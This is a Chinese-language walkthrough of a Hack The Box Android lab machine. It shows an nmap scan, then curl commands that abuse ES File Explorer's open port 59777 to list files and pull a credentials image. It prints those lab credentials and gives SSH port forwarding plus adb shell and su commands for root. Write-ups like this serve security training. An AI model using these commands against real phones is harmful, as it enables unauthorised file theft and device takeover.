基本信息

端口扫描

应该是HTB第一台Android靶机,需要全端口扫描:

1
2
3
4
5
6
7
8
9
10
11
12
13
$ nmap -p- 10.10.10.247
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-28 08:59 CST
Nmap scan report for 10.10.10.247
Host is up (0.073s latency).
Not shown: 65530 closed ports
PORT STATE SERVICE
2222/tcp open EtherNetIP-1
5555/tcp filtered freeciv
38991/tcp open unknown
42135/tcp open unknown
59777/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 985.66 seconds

59777

直接访问是禁止目录列举:

ES File Explorer

直接搜索android 59777,可以发现是ES File Explorer:

1
2
3
4
curl --header "Content-Type: application/json" --request POST --data '{"command":"[my_awesome_cmd]"}' http://192.168.0.8:59777

curl --header "Content-Type: application/json" --request POST --data '{"command":"getDeviceInfo"}' http://10.10.10.247:59777
curl --header "Content-Type: application/json" --request POST --data '{"command":"listFiles"}' http://10.10.10.247:59777/sdcard

user flag

sdcard目录下发现user.txt,直接访问即可:

Creds信息

DCIM里有个creds.jpg:

1
2
kristi
Kr1sT!5h@Rp3xPl0r3!

这个账号密码可以ssh登录:

adb & root flag

端口扫描发现5555被过滤,可以通过ssh端口转发后adb连接,能直接su:

1
2
3
4
5
ssh -L 5555:127.0.0.1:5555 kristi@10.10.10.247 -p 2222

adb connect localhost:5555
adb shell
su

root flag

参考资料